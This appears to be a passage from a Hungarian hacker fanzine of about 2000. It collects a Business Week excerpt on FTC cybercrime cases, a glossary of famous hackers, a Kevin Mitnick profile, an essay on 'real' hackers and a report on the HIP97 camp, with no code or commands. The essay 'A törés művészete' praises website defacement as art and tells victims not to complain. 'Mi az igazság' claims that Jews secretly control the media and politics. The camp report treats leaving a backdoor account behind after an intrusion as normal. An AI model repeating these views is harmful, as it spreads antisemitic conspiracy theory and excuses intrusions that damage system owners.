tervekkel vagy soha meg nem érkezett aukciós tárgyakkal kapcsolatos panaszokkal<br />

foglalkozó kereskedelmi hatóság, a Federal Trade Commission (FTC) tavaly 61 pert<br />

indított (1994-ig viszont, amikor a háló még gyerekcipőben járt, mindössze egyet). Ez<br />

idáig a bírósági eljárások több mint 20 millió dollár fogyasztói kár megtérítését rótták<br />

ki, és éves szinten - becslések szerint - 250 millió dollárt meghaladó csalási<br />

tevékenységet számoltak fel.<br />

De az FTC nem elégszik meg ennyivel: képviselői februárban szenátusi<br />

meghallgatáson vettek részt, ahol a testület költségvetésének növelését<br />

szorgalmazták, hogy új internetes stratégiákat dolgozhassanak ki, valamint hogy<br />

felvehessék a harcot a cybercsalásokkal szemben. A pénz ahhoz kell, hogy az egyre<br />

találékonyabb rendszerek nyomába eredhessenek. Szeptemberben például az FTC<br />

olyan portugál és ausztrál személyek ellen indított pert, akik "honlapeltérítést" és<br />

"egérrablást" követtek el, amikor amerikai székhelyű website-okat engedély nélkül<br />

lemásoltak, s azokhoz megtévesztésig hasonló lapokat regisztráltattak a nagyobb<br />

internetes keresőkön. A vádlottak a mit sem sejtő vevőket a honlapokról pornó siteok<br />

láncolatához vezették, s azokból a laikus fogyasztók ki sem tudtak lépni. Az FTC<br />

elérte, hogy a bíróság határozatban parancsoljon megálljt a csalásnak, felfüggesztve<br />

az alperesek website regisztrációit.<br />

A felügyelő hatóságok szerint a cyberbűnözés virágzásának egyik fő oka az, hogy az<br />

emberek sokkal jobban bíznak az internetben, mint amennyire azt ez a rendszer<br />

kiérdemli. "Sok hasznos információhoz juthat az ember a hálón, de annak, amit ott<br />

tesz, 95 százaléka puszta jóhiszeműségen alapul" - mondja G. Philip Rutledge a<br />

pennsylvaniai értékpapír-felügyelet helyettes főtanácsadója. "Ez sajnos utat nyit a<br />

csalások előtt."<br />

Ha a cyberbűnözésnek gátat akarunk szabni, nincs más választás: a<br />

biztonságtechnológiának kell az internet következő húzóágazatává válnia.<br />

IRA SAGER, STEVE HAMM ÉS NEIL GROSS, NEW YORK JOHN<br />

CAREY, WASHINGTON-ROBERT D. HOF, SAN MATEO (c) Business<br />

Week<br />

- H3XR00T -<br />

http://hexnet.hpage.<br />

net/<br />

2000.03.0<br />

7.<br />

************************************************************************************************<br />

14


Alternatív kultúra: Hackerek<br />

forrás: http://www.internetto.hu/internetto/zene/altcult/<br />

hackerek<br />

Hackers’ Guide<br />

A Zen-tanítványok megfeleloi a számítógépes világban: matematikai muveleteket<br />

képesek fejben elvégezni tizenhatjegyu számokkal, és napokig elvannak néhány<br />

doboz Jolt üdíton meg pár zacskó chipsen. Bár maguk a hackerek szóba se állnak a<br />

crackerekkel, vagyis azokkal, akik szokatlan képességeiket számítógépes<br />

rendszerek szétrombolására használják, a tömegtájékoztatás általában nem tesz<br />

különbséget a két csoport között. Sot, a gonoszokat nevezi ki a hacker-mitológia<br />

fohoseinek, például a Phone Phreaks Kevin Mitnick-et, vagy a New York-i Masters of<br />

Deception csoportot (ld. még: Phiber Optik). Pedig az igazi hackerek csak a saját<br />

etikájuknak engedelmeskednek, ami úgy szól, hogy az információ szabadságra<br />

vágyik. Néhányan közülük, például Bill Gates, milliomosok lettek. (ld. még: Free<br />

Software Foundation, 2600)<br />

phone phreaks - telefonorültek<br />

Azok, akik abban lelik örömüket, hogy telefonrendszereket ismernek ki, hogy<br />

manipulálhassák. Elso példányaik a 60-as években bukkantak fel, jóval a<br />

komputerek és a crackerek (ld. hackerek) elott. A mufaj egyik legendás alakja,<br />

bizonyos Captain Crunch egy játékdobozzal képes volt 2600 Hertzes fütyülo hangot<br />

eloállítani, azt, amelyik a régi típusú telefonrendszereket irányította. A hang emlékét<br />

a 2600 magazin címe ma is orzi.<br />

2600<br />

Telefonorült (lásd phone phreaks) és számítógép-hacker olvasóknak szánt,<br />

negyedévente megjeleno fanzine: címe arra a frekvenciára utal, amelyet egy idoben<br />

a telefontársaságok szereloi használtak, hogy bejuthassanak vele a<br />

telefonvonalakra. Foszerkesztoje, Eric Corley Emmanuel Goldstein néven (George<br />

Orwell 1984 címu regényének mítikus ellenzéki figurája) adja ki a lapot, amely<br />

egyébként 1984-ben indult. Cikkei részint tanácsokat adnak telefon- és<br />

számítógéphálózatok elleni akciókhoz, másrészt kiáltványok az<br />

információszolgáltatásban muködo nagyvállalatok és az oket pártoló törvények ellen.<br />

Corley, ahol csak teheti, kiáll a hackerek mellett: még a Kongresszus egyik<br />

meghallgatásán is felszólalt, ahol kifejtette, hogy a hackerek nem a profit<br />

reményében, hanem a szellemi szabadság határainak kitágításáért követik el, amit<br />

elkövetnek, szemben a fehérgalléros - vagyis értelmiségi bq.nözôkkel és a külföldi<br />

kémekkel.<br />

15


Hackers’ Guide<br />

Mitnick, Kevin<br />

(1963) Legendás hacker, akinek sikerült betörnie az FBI vonalaira, és ezekrol<br />

követnie az ellene indított, majd két évig tartó embervadászatot. 1995 februárjában<br />

végül elkapták: nyolc héten át üldözte az Internet-en a komputerbiztonság legjobb<br />

szakértojének tartott Tsutomu Shimomura. A New York Times riportere, John Markoff<br />

követte a cyber-vadászatot. Megírt róla mindent, kivéve azt, hogy o és Shimomura<br />

filmszerzodést kötöttek a Mitnick-ügyrol. Markoff már régebben érdeklodött Mitnick<br />

bravúrjai iránt, az o akkor még ismeretlen alakjáról rajzolta a hacker figuráját az<br />

1992-ben megjelent Cyberpunk címu könyvben, amelynek társszerzoje volt. Mitnick<br />

kövér, szégyenlos, magányos kölyökként nott fel Los Angeles egyik elovárosában.<br />

Kamaszkorát a komputer mellett töltötte, sikerült betörnie a manhattani<br />

telefonközpont adattárába, sot - megelolegezve az 1983-as War Games címu filmet -<br />

a hadügyminisztérium hálózatába is. Nemcsak a számítógép elott volt sikeres<br />

hacker: "társadalommérnökként" - vagyis az olyan hacker-trükkök esetében, amikor<br />

csak személyes érintkezés során, például telefonszereloként fellépve lehet<br />

valamilyen kód birtokába jutni - is nagyokat alakított.<br />

Phiber Optik<br />

(Mark Abene, 1972) A komputer és a telefontechnológia mestere, a New York-i<br />

Masters of Deception (MOD) hacker-banda vezetoje. A csapat legnagyobb húzása<br />

1989-ben volt, amikor feljutottak New York egyik közszolgálati tévécsatornájának<br />

komputerhálózatára, és a képernyokön boldog Hálaadást kívántak a pulykáknak<br />

(Happy Thanksgiving, you turkeys, from all of us at MOD - a "turkey" szó egyébként<br />

idegbajos kis hülyét is jelent; másrészt viszont az amerikaiak, ha csak tehetik,<br />

Hálaadás ünnepén pulykasültet esznek - a ford.) Abene saját állítása szerint ebben<br />

nem volt benne. 1992 júliusában viszont benne volt egy sorozat, jobbára ártatlan<br />

számítógéphálózat-feltörésben, amiért egy évi börtönre ítélték. Tíz hónapot ült,<br />

ezalatt annyi újságíró kereste fel, hogy cellatársai elkeresztelték CNN-nek. A<br />

börtönben megtagadták tole a számítógépet, így sokak szemében valóságos népi<br />

hossé vált. Kiszabadulása után Stacy Horn, az Echo Bulletin Board System vezetoje<br />

alkalmazta. Legnagyobb húzásait Michelle Slatalla és Joshua Quittner The Gang<br />

That Ruled Cyberspace címu "hacker-szentéletrajza" örökítette meg.<br />

************************************************************************************************<br />

Hackerek<br />

Ötven évvel ezelott, amikor a számítógépek elterjedtek az egyetemeken,<br />

hackereknek azokat nevezték, akik a technikai színvonalat fejlesztették. A hackerek<br />

16


Hackers’ Guide<br />

rendszereket építettek, teszteltek, és új módszereket fedeztek fel. Voltak csoportjaik,<br />

akik a Technológiai Szociális Szolgálat név alatt voltak ismertek a nyilvánosság elott.<br />

Ok javították ezeket a számítógépes rendszereket.<br />

Ma, ötven évvel késobb, egész más csoportok hívják magukat "hackerek"-nek. Egy<br />

generáció eltunt, és velük együtt a beállítottságuk, a tudásuk, és céljaik. Manapság<br />

úgy tunik, hogy a hackerek már nem a számítógépek lehetoségeit kutatják, inkább<br />

rombolnak.<br />

De ki tudja ezeket az embereket a tettükért megvádolni?<br />

Ez egyfajta "hosszú utazás", amely nagy mennyiségű rombolást és főbenjáró<br />

bűncselekményt tartalmaz.<br />

"De miért van ez így?" - kérdezhetjük. Nos ennek egy egészen egyszerű oka van.<br />

Ha egy általános felhasználó úgy döntött, hogy egy pár fokkal feljebb akar kerülni a<br />

hierarchián azzal a céllal, hogy többet tudjon meg a számítógépérol, akkor ő a<br />

hacker címet fontosnak látja. Ők valahol hallották, hogy a hackerek valószínűleg<br />

mindentudó felhasználók, és ezért akarnak ők is azok lenni. Ezenkívül igen "Cool"<br />

dolog hackernek lenni (mint ahogy mozikban mutatták a hackereket).<br />

Tehát a tudatlan Heinz folytatja az utazását, és próbálkozással kezdi megtanulni a<br />

hackerkedést. Valakitől hallotta, hogy egy hackernek 30 programnyelvet és 10<br />

operációs rendszert kell ismernie. "Hmmm, mik az operációs rendszerek? A DOS<br />

nem az egyike ezeknek? Legalább lehetséges az, hogy mindenre, amire szükségem<br />

van, online megtalálhatom."<br />

A tudatlan Heinz fog egy keresőt, és rákeres a "hacker" szóra, mint keresett<br />

fogalomra. Eddig ez a kezdő az Internetet csak az iskolai kérdések miatt használta:<br />

újságok, enciklopédiák, tudományos (tan)tárgyak. Honnan tudhatja majd, hogy az<br />

információk, amit ő olvasni fog, valószínűleg minden szempontban hamisak lesznek?<br />

A kérdések rengeteg "földalatti" weblaphoz vezetnek vissza. - "Hackerek!".<br />

A tudatlan Heinz azonnal szörföl ezekre az oldalakra, és mindent elolvas, amihez<br />

hozzáfér. De a valóságban itt egyáltalán nem talál olvasnivalót, hanem helyette a<br />

következőket:<br />

- Cracks<br />

- DoS Tools<br />

- MS Windows-os trojan programok<br />

A kezdő ezeket a programokat mind elkezdi használni, azt gondolva, hogy ez<br />

minden, ami körül a Hackervilág forog.<br />

A valóságban ez nem így van. Ezek a programok elterjesztik a pusztulást, és nem<br />

tanítanak NEKED semmit sem. Ha ez az, amit te csinálni akarsz, akkor hát csináld. -<br />

De légy akár annak a tudatában is, hogy e programok használata soha nem fog<br />

téged "továbbvinni".<br />

Az igazi hackerek (programozók, biztonsági szakemberek, Internet profik) még<br />

mindig hasonló célokat követnek, mint akik 1950-ben. Ezek a hackerek kernel<br />

17


Hackers’ Guide<br />

modulokat, programokat, scannereket írnak, és hibákat találnak azzal a céllal, hogy a<br />

technikai rendszereket javítsák.<br />

Ezek az igazi hackerek, az emberek, akik minden lehetségest megcsinálnak. Nem<br />

azok az emberek a hackerek, akiket a fimekben, mint hackereket láttál. Ha valóban<br />

hacker akarsz lenni, akkor ne szórakozz ezeken a win32-es trójai programokon!<br />

írta: BinaryZer0<br />

magyarra fordította: Manguszta<br />

************************************************************************************************<br />

A törés művészete<br />

A `hackeles` sokban hasonlit a muveszetekhez, de sokkal komplexebb azoknal,<br />

sokban nehezebb es sokban konnyebb. Nehezebb, mert tobbnyire csak egy ut van,<br />

amin jarni lehet, es egy megoldas letezik... mivel mindig a tokeletes vegkifejlethez<br />

kell elerkezni, nem lehet hibazni mert akkor minden borul... Konnyebb azert, mert sok<br />

tampont letezik, lehet tapogatozni, igaz kicsit sotetben, de valahol mindig ott van a<br />

megoldas fenye, ott lebeg elottunk csak eszre kell venni, kell, hogy legyen annyi<br />

kreativitasunk, hogy megalkossuk.<br />

Nem a vegkifejlett a fontos, hanem az oda vezeto ut. A mu maga nem a deface vagy<br />

a muvunkkel valo henceges, hanem az, amig eljutunk oda. Magunk valasztunk, hogy<br />

ez az ut konnyu - azaz egyszeru - vagy pedig nehez - tehat muveszi. Persze az<br />

egyszerusegnek is megvan a maga szepsege, van amikor a legegyszerubb<br />

megoldashoz kell a legnagyobb kreativitas es ez visz egy kis komikumot a<br />

megoldasba. A deface-t fel lehet fogni ugy is, mint egy kis promociot a muvunknek,<br />

hogy tobben csodalhassak meg azt, tehat egyaltalaban nem elitelendo...<br />

Az alkotasnak amit krealtunk sok eredmenye lehet, melyet nevezhetunk akar<br />

sajtovisszhangnak, vagy lejaratasnak, de csak az igazi `muertok` tudjak elvezni a<br />

szepseget a munek.<br />

Vannak a muveszek kozott kevesbe kreativak is, - script-kiddie - de mindent lehet jol<br />

csinalni. Ha valaki jol banik az ecsettel - amit lehet, hogy mas adott a kezebe -<br />

akkoris lehet remekmuvet alkotni, mert ugy sem mindig konnyu az ut - egyszeru a<br />

mu.<br />

Meg kell probalni elvezni a dolgot es nem karogni mas torese felett, inkabb meg kell<br />

probalni megkeresni az O muveben is a szepseget, a tokeletesseget. Minden ember<br />

mast lat benne, de az az igazan ugyes, aki tud mindent a masik szemszogebol latni<br />

es megerteni a gondolkodasat.<br />

Akarva akaratlan okozhatunk kart, de a muveszetnek ez a fo szerepe eletunkben,<br />

hogy ujat teremtsen megreformalja a megszokott dolgokat, felrugja a trendeket es<br />

18


lazadjon a betokozodas ellen. Aki esetleg kart szenved egy mutol, annak is a<br />

szepseget kell keresnie, nem pedig tamadni.<br />

tobo - tobo@linuxfan.com<br />

Hackers’ Guide<br />

************************************************************************************************<br />

Mi az igazság<br />

Hallasz egy hirt a TV-ben, hazank nemsokara eler ilyen, olyan szintet Europaban,<br />

nemsokara javul az eletszinvonal. Hallasz egy masikat, amiben egy olyan erdektelen<br />

dolgot kozolnek, mint peldaul az aktualis tozsdeinformaciok. Az elsore azt mondod<br />

magadban, `Biztos csak egy ujabb atbaszas, a fele sem igaz, soha nem lesz jo az<br />

eletszinvonal...etc`, a lenyeg az hogy nem hiszed el, elfelejted. A masik hir tok<br />

erdektelen szamodra, viszont megeshet, hogy pont errol fogsz tarsalogni az egyik<br />

baratoddal, a lenyeg az, hogy megmarad a fejedben.<br />

Az ijen dolgok, amik megmaradnak az ember fejeben altalaban egy szoval<br />

definialhatok, melyet meg talan te is ismersz: `emlekek`. Az emlekek szerepe az<br />

eletedben nagyobb mint gondolnad, ezen tapasztalatok alapjan dontesz egyes<br />

szituaciokban, cselekszel hirtelen vagy megfontoltan. Mivel az emlekek<br />

megmaradnak akar tobb tiz evig is befolyassal lehetnek az egesz eletedre, es nem<br />

nehez elkepzelni mekkora hatalommal rendelkezik az aki az emlekeket `gyartja`.<br />

Eddig a pontig minden rendben is van, de mivan ha olyan dolgokat hallasz, amik<br />

alapjan ugy cselekszel a kesobbiekben, ahogy az az `emlekgyarosnak` megfelel?<br />

Hat ez bizony mar ciki. Most azt gondolhatod, hogy aaaa, hat teged nem befolyasol<br />

senki, te lazado vagy, etc... Ne hidd!<br />

99%, hogy a te szokasaid kozott is tobb olyan van, melyet az emlekeid miatt vettel<br />

fel. Nehez elhinni, de sok osztonod, melyek a szuletesed utan alakultak ki is<br />

befolyasolhato a tapasztalataid altal, tehat szinte nincs olyan terulet amit nem lehet<br />

iranyitani.<br />

Az, hogy ezek a dolgok leteznek teny, bizonyitani nem lehet, epp ettol ilyen tokeletes<br />

ez a rendszer. Tamadni oket, harcolni ellenuk, lazadni? Ertelmetlen, tobb okbol is, az<br />

egyik az, hogy ugy sem nyerhetsz, nem tudsz eleg embert felsorakoztatni, hogyha<br />

megis, ok sem `tisztak` nincs olyan ember, akit nem tudnak befolyasolni ha nagyon<br />

akarjak, mindenkinek lehet olyan dolgot mutatni amitol alapjaiban valtozik meg a<br />

gondolkodasa. Az ijen irasok pedig teljesen ertelmetlenek, mivel par nap vagy het<br />

mulva te is, aki olvasta el fogod felejteni, vagy azt hiszed, hogy talaltal valamit ami az<br />

egesz ellenkezojet bizonyitja. Ez a resze a dolognak teljesen automatikusan<br />

jatszodik le benned, nem tesznek erte. Van meg valami, amiert nem erdemes<br />

harcolni a `hatalom` ellen. Megpedig az, hogy aki megdont egy hatalmat, hatalomba<br />

kerul, es a hatalom elveszi az emberek eszet, nincs mit tenni, valaki mindig a tobbiek<br />

19


Hackers’ Guide<br />

felett all, es lehet, hogy mas modszerekkel fog cselekedni, de a rendszer mindig<br />

ugyanaz marad. Nagy hatalom tobbet tudni masoknal...<br />

Hogy, kik ezek? Nem lehet tudni, valoszinusitem, hogy a mindenkori ertelmisegi<br />

reteg elitje, akiknek van ahhoz eszuk, hogy mozgassak a szalakat, nem rasszizmus<br />

amit mondok, de a zsidok, vagy az o leszarmazottaik azok, akik bizonyitottan<br />

intelligensebbek a tobbi embernel, de termeszetesen semmi nem biztos ilyen teren.<br />

A lenyeg az, hogy a politika is csak egy alca ezen szervezetek mukodesenek, a<br />

partharcok, partok, politikusok csak babuk.<br />

Amit jo ha tudsz, minden amit hallasz, latsz a mediakban, a sajtoban, az interneten,<br />

kapcsolatban all a `hatalommal`, ami iranyitja az eletet. Meglehet, hogy ez a<br />

letszukseglet, enelkul nem tudnak elni, kaosz lenne, de az is lehet, hogy ez mindmind<br />

csak a hatalomert van, azert, hogy valaki feljebb alhasson a tobbieknel, tobbet<br />

tudva mindenkirol.<br />

Kerdes jogos lehet, hogy akkor miert adnak hirt a mediakban kulonbozo<br />

lehallgatasokrol, (Aktak) es hasonlo `titkosszolgalati` modszerekrol, miert hallasz<br />

hasonlo dolgokat sci-fi filmekbol? Csak gondold el, hogy ami ilyen jellegu informacio<br />

eljut hozzad az mind-mind mar `lejart dolog`. Mar reg ota nem hasznaljak, elavult,<br />

van sokkal jobb, precizebb, pontosabb es meg eszrevehetetlenebb. A minap lattam<br />

egy musort, ahol egy lehallgatot mutattak be, amely `negyedik generacios` volt, a<br />

mukodesenek lenyege az, hogy ha a szobaban van egy femtargy akkor az osszes<br />

hangot tovabbitani lehet minden mas eszkoz nelkul egy keszulekhez. Nos a poen<br />

nem az, hogy ennyire konnyen lehallgathatoak vagyunk, hanem az a teny, hogy<br />

jelenleg a hatodik generacios lehallgatokat fejlesztik. Elgondolkodtato...<br />

Ha elgondolkodsz logikus. Miert adnak ki a gyarakbol a fejlesztouzemekbol a<br />

legujabb technologiakat, a leggyorsabb szamitogepeket, etc., hogyha meg is<br />

tarthatjak, es a kovetkezo tehcnologia megjeleneseig hatalommal birhat az aki<br />

birtokolja, ismeri az akkori legfejletebbet? Valoszinuleg lassankent adagoljak a<br />

fejlodest, elkepzelhetonek tartom, hogy sok szaz globalis problemat meg tudnank<br />

mar oldani, ha az uj technologiakat nem tartanak vissza.<br />

Megeshet, hogy sokan ezt az iromanyt badarsagnak tartjatok, de elhihetitek van<br />

benne igazsag, csak el kene egy kicsit gondolkodni a dolgokon.<br />

tobo - tobo@linuxfan.com<br />

************************************************************************************************<br />

Kevin D. Mitnick, a CyberKalóz<br />

A világ legveszélyesebbnek kikiáltott hackerét, az Amerikában évek óta körözött<br />

Kevin D. Mitnicket több mint egy éve egy sértett adatvédelemszakértô fogta el<br />

kéthónapos digitális bújócska és fogócska után. A számítógépkalózra az FBI,<br />

20


Hackers’ Guide<br />

Tsutomu Shimomura cyberdetektívre pedig az új típusú hôsökre vadászó amerikai<br />

média csapott le egy esôs februári hajnalon.<br />

Kevin nem az az anyagias típus. Bár tinédzser kora óta bohócot csinál bármely<br />

digitális rendszervédelembôl és az általa eltulajdonított szupertitkos dokumentumok,<br />

friss fejlesztésű szoftverek és egyéb nagyértékű információk összértékét több<br />

százmillió dollárra becsülik, pénzhiány miatt hivatalból kirendelt ügyvéd védi. Az ôt<br />

rendôrkézre juttató hibát 1994 karácsonyán követte el.<br />

Tsutomu Shimomura, az USA egyik vezetô adatvédelmi szakértôje, a San Diego<br />

Supercomputer Center üdvöskéje éppen szokásos évi síszabadságát töltötte a Sierra<br />

Nevadában amikor munkatársai elképesztô hírt adtak a tudtára. 1994 december 25.én<br />

az Interneten át valaki behatolt a tengerparti házában működô<br />

számítógéprendszerbe, kipakolta a legújabb adatbiztonsági programjait, tréfás<br />

hangüzenetet hagyott a merevlemezen és távozott. Az ismeretlen hacker az<br />

Interneten alkalmazott Unix operációs rendszer egy olyan biztonsági hiányosságát<br />

használta ki amelynek elméleti lehetôségét egy másik híres számítógépbetyár,<br />

Robert T. Morris, az Internet Worm hálózati pszeudo-vírus kiagyalója már 1985-ben<br />

felvetette. Az cyberzsaru a hálón keresztül azonnal telekürtölte a világot a hírrel,<br />

felvette a kapcsolatot az FBI képviselôivel, és ezzel megkezdôdött a két<br />

számítógépes zseni sakkjátszmája a cybervilágot jelentô digitális számítógép és<br />

telefonhálózatok dzsungelében.<br />

A sors iróniája, hogy az elsô nyomot január végén egy Számítógépek, Szabadság és<br />

Privátszféra elnevezésű alapítvány Internet postafiókjában találták, ahová az<br />

információszabadság még mindig névtelen bajnoka felmásolta a Shimomurától lopott<br />

adatvédelmi dokumentációt. Az alapítvány nem értékelte a gesztust, azonnal<br />

értesítették a hatóságokat. Nem telt el 24 óra, és Shimomura az e célra készített<br />

speciális megfigyelô program segítségével már laptopja képernyôjén követte nyomon<br />

az alapítvány Internet-szolgáltatójánál, a kaliforniai Berkeley Whole Earth 'lectronic<br />

Link (Well) szerverén történt újabb behatolást. Az elkövetô profizmusa, stílusa és<br />

módszerei egyaránt az évek óta illegalitásban tevékenykedô Mitnickre terelték a<br />

gyanút.<br />

Mitnick élettörténete egy folytatásos digitális ámokfutás. A lapok címoldalaira elôször<br />

1982-ben került, amikor bejutott az Amerikai Légvédelem egyik szuperkomputerébe.<br />

Tizenhét évesen egy telefonfülkébôl feltörte a Pacific Bell számítógéprendszerét,<br />

több telefonszámlát lenullázott és ellopott mintegy 200.000 dollár értékű adatot. Hat<br />

hónapot kapott egy nevelôintézetben, próbaidôvel szabadult, de azonnal törölte az<br />

ügy részleteit a rendôrség adatbázisából, megsemmisítette a bíró bankszámláját egy<br />

bankban, majd Izraelbe menekült. Amikor a dolog elfelejtôdött, visszatért az<br />

államokba, de nemsokára ismét hallatott magáról. Mindig igyekezett megsemmisíteni<br />

minden személyére utaló adatot, de 1988-ban (ekkor 25 éves volt) több hiábavaló<br />

kisérlet után sikerült rábizonyítani hogy 4 millió dollár értékű kárt okozott az egyik<br />

vezetô amerikai számítógépgyár, a Digital Equipment Corporation (DEC)<br />

adatbázisaiban biztonsági szoftverek és titkos kódok eltulajdonításával. A tárgyalás<br />

során az ügyész rámutatott : "Ez az ember nagyon, nagyon veszélyes, a saját és a<br />

társadalom érdekében távol kell tartanunk minden számítógéptôl", a börtönben még<br />

telefonközelbe sem engedték. Ügyvéde bizonyította hogy kliense számítógépfüggôségben<br />

szenved, így egy éves börtönbüntetés után próbaidôre bocsátották és<br />

egy Los Angelesi terápiás intézetben helyezték el. Szabadulása után rögtön<br />

21


Hackers’ Guide<br />

megsértette a próbaidô feltételeit és 1992 óta eltűnt a hatóságok szeme elôl. A<br />

cybertérben idôrôl idôre felbukkant azóta is, többek között FBI kódokkal behatolt több<br />

állami adatbázisba, és nagy rádiótelefon-gyártó cégektôl, mint például a Motorola,<br />

NEC, Nokia pedig rendszeresen elemelte az operációs szoftvereket.<br />

Február 9.-én egy másik Internet-szolgáltató, a San Jose székhelyű Netcom<br />

illetékesei felfedezték hogy valaki mintegy 20.000 felhasználójuk hitelkártyaszámát<br />

vitte el. Ez súlyos könnyelműség volt Mitnick részérôl, mert a Netcom dial-up, vagyis<br />

telefonvonalon elérhetô szolgáltatást biztosít, a támadás is telefonon keresztül érte,<br />

így kitalálható hogy ez volt a hacker kiindulópontja, az a bázis, ahol a<br />

telefonhálózaton keresztül csatlakozott az Internet számítógép-világhálózatra.<br />

Shimomura és stábja áthelyezte székhelyét a Netcom-hoz, gyakorlatilag nem volt<br />

más dolguk mint ellenôrizni minden egyes bejövô hívást a telefontársaságok<br />

adatbázisaiban. Hamarosan rájöttek hogy a hacker egy fiktív rádiótelefonról dolgozik,<br />

hívásait két megpiszkált adatbázisú lokális központ egyaránt a másiknak<br />

tulajdonította. Shimomura és az FBI a helyszínen munka közben bemérték, és<br />

február 16.-án hajnalban elfogták Mitnicket.<br />

Az amerikai sajtó egyre növekvô érdeklôdéssel figyelte az ügyet, amely a Masters of<br />

Deception fedônevű hacker társaság óta a legfelkapottabb cyber-szenzáció. A New<br />

York Times folyamatosan tudósított az ügyrôl, hasábjain Shimomura posztmodern<br />

hérosszá magasztosult. A Hyperion kiadó máris 600.000 dollár foglalót adott a<br />

Shimomura és John Markoff, a New York Times riportere által írandó könyvre,<br />

Hollywood is érdeklôdik, meg nem erôsített hírek szerint maga Spielberg rendezné a<br />

filmváltozatot.<br />

Az Internetet komolyan megosztotta az ügy, egyesek elmarasztalják Mitnicket a<br />

hacker etika megsértése miatt, a legkomolyabb érv az Internet alapvetôen kölcsönös<br />

bizalomra, és nem high-tech adatvédelemre épülô struktúrájának megkérdôjelezését<br />

rója fel a megszállott crackernek. A jelenség komolyan hátráltathatja az Internet<br />

utóbbi idôben egyre inkább tettenérhetô kommercializálódását, ez viszont már inkább<br />

dícséret az egyre halványuló nonprofit jelleget támogatók részérôl. A mátrix<br />

eredendôen anarchista tulajdonságait kedvelô komputer-underground körökben<br />

pedig napról-napra terebélyesedik a Condor fedônevű cyberpunk mítosza. Az a tény,<br />

hogy Mitnick nem próbált meggazdagodni akciói révén, és hogy a SUN<br />

Microsystems, a nyílt számítógépes rendszerek gyártója és hálózati szoftverek<br />

fejlesztôje biztonság-tesztelési szempontból egyenesen hasznosnak tartja az efféle<br />

betöréseket, egyaránt megkérdôjelezi a deviáns zsenit börtönbe juttató jogrendszer<br />

helytállóságát.<br />

Bodoky Tamás írása alapján.<br />

Megtalálta és átszerkesztette: WALTER<br />

************************************************************************************************<br />

22


Hacker találkozó Hollandiában<br />

Hackers’ Guide<br />

Mottó: "A hack-elés nem egy technikai dolog, hanem egy életforma!"<br />

-az ismeretlen hacker-<br />

Nem árt elõre tisztázni, hogy a hacker és a cracker szó között tartalmilag óriási a<br />

különbség! A hacker behatol, élvezi a bentlétet, a sikert, otthagyja nyomát<br />

(legtöbbször csinál magának egy jó azonosítót "jó lesz ez még késõbb" alapon), majd<br />

távozik. Akad olyan is, aki eltávolít minden nyomot, hogy ne tanuljon senki sem a log<br />

file-ok tartalmából. A mûveletsor asszociálható máshoz, de rossz az aki rosszra<br />

gondol :-)<br />

A hacker szó annak idején a kisebb kapacitású gépek képességeit maximálisan<br />

kihasználó programozót illette, aki a gép legmélyebb részeibe is belekotort, hogy<br />

programjait használhassa. Sokszor versenyeztek is, hogy egy adott feladatot ki tud<br />

optimálisan megoldani.<br />

A cracker viszont rosszra használja a lehetõséget, és nagy károkat okoz, mint<br />

amilyen kár lehet egy a gyökérkönyvtárra kiadott rekurzív törlés parancs, amire volt<br />

már példa egyetemi és üzleti szférában egyaránt.<br />

Vannak nehezen eldönthetõ esetek is (hacker vagy cracker?), ilyen a megbántott<br />

svéd, magukat hacker-eknek valló emberek története, akik a CIA Web lapját<br />

alakították át egy kicsit. A CIA mellett hasonló támadásnak esett áldozatául többek<br />

között a Légierõ, a Fehér Ház, és az FBI Web szervere is. Természetesen nem kell<br />

annyira misztifikálni a dolgot, ha egy Web szerver "elesik", hisz nem ezeken tárolják<br />

a bizalmas adatokat az ilyen szervek! Ma a http://www.skeeve.net/cia/ alatt lehet<br />

megtalálni az akkori lapok mását. Kárt ugyan nem okoztak, de nem is díjaznák õket,<br />

ha horogra kerülnének!<br />

Egy kérdés: vajon az egyes államok nem alkalmaznak-e hacker-t és cracker-t<br />

egyaránt, bizonyos információk megszerzésére, mint ahogyan tette ezt az U.S.A. a<br />

GATT tárgyalások elõtt fontos információkhoz jutva (a brit állítás nem bizonyított),<br />

vagy az Öböl-háborúban megbénítva az iraki kommunikációs rendszert? Hacker<br />

vagy cracker?<br />

***<br />

A HIP (Hacking In Progress - http://www.hip97.nl) helyszíne az "In The Middle Of<br />

Nowhere" azaz a "Sehol Közepe" nevet kapta, ami valójában a hollandiai Almere-<br />

Buiten közelében felállított ideiglenes kempinget jelenti. A kempingtábor, a<br />

körülményekhez képest korrekt tisztálkodási és étkezési lehetõségekkel volt<br />

felszerelve. Az árak ebben az országban sem a mi kereseteinkhez szabottak, bár<br />

helybeliként az 1200 (holland) forint havi munkanélküli segélybõl is megélnénk, ami<br />

közel 120.000 (magyar) forint...<br />

Az infrastruktúrához hozzátartozott, hogy telefonálni is lehetett a felállított kártyás<br />

telefonokról, a mellette levõ automatából pedig folyamatosan lehetett venni a<br />

telefonkártyát. A "Hall"-ban a legnagyobb sikert a Jolt Cola aratta<br />

(http://www.joltcola.com), ami félhivatalosan hacker ital a magas koffeintartalma<br />

23


Hackers’ Guide<br />

miatt. Ennek segítségével kitartóbban lehet hajnalig dolgozni, amikor egyes<br />

fáradtabb root-ok már nyugovóra térnek...<br />

A táborban sátrak tömkelege. A szervezõk adatai alapján a táborban több, mint<br />

kétezer ember volt és több száz számítógép. Volt aki hozott saját parabolaantennát<br />

vagy micro-t! A leghatásosabb látványt számomra az a fehér teherautó jelentette,<br />

aminek szegecselt borítása kissé megviseltnek látszott, és a hátsó része ki volt<br />

nyitva, így lehetett látni, hogy a rozoga külsõ mögött több számítógép is üzemel. A<br />

melegben félmeztelenre vetkõzött hosszú hajú srácok a MetallicA Kill'em all címû<br />

lemezét hallgatták, miközben a hack-elés folyamatban volt...<br />

No remorse, no repent<br />

We don't care what it meant<br />

Another day, another death<br />

Another sorrow, another breath<br />

Attack...<br />

Majd ezt követte a Seek & Destroy és a Metal Milita... Az összkép pezsdítõ!<br />

A Metal Rendõrség nem, de a holland FBI 24 órán keresztül képviseltette magát az<br />

összejövetelen, így nem mindenki mert a nyilvánosság elõtt mindent bemutatni.<br />

Ugyanakkor zárt körökben az emberek igencsak megnyíltak, és szívesen mutatták<br />

be tudományukat. A zárnyitók sátrában is nagy volt a forgalom, de elõadást õk sem<br />

tartottak... Reklámoztak viszont egy "HACKS" címû filmet. A filmet Christine Bader<br />

készítette a hacker-ekrõl és Bielefeld városában fogják bemutatni október 5.-én.<br />

Talán akad majd filmforgalmazó, aki Magyarországra is behozza a filmet!?<br />

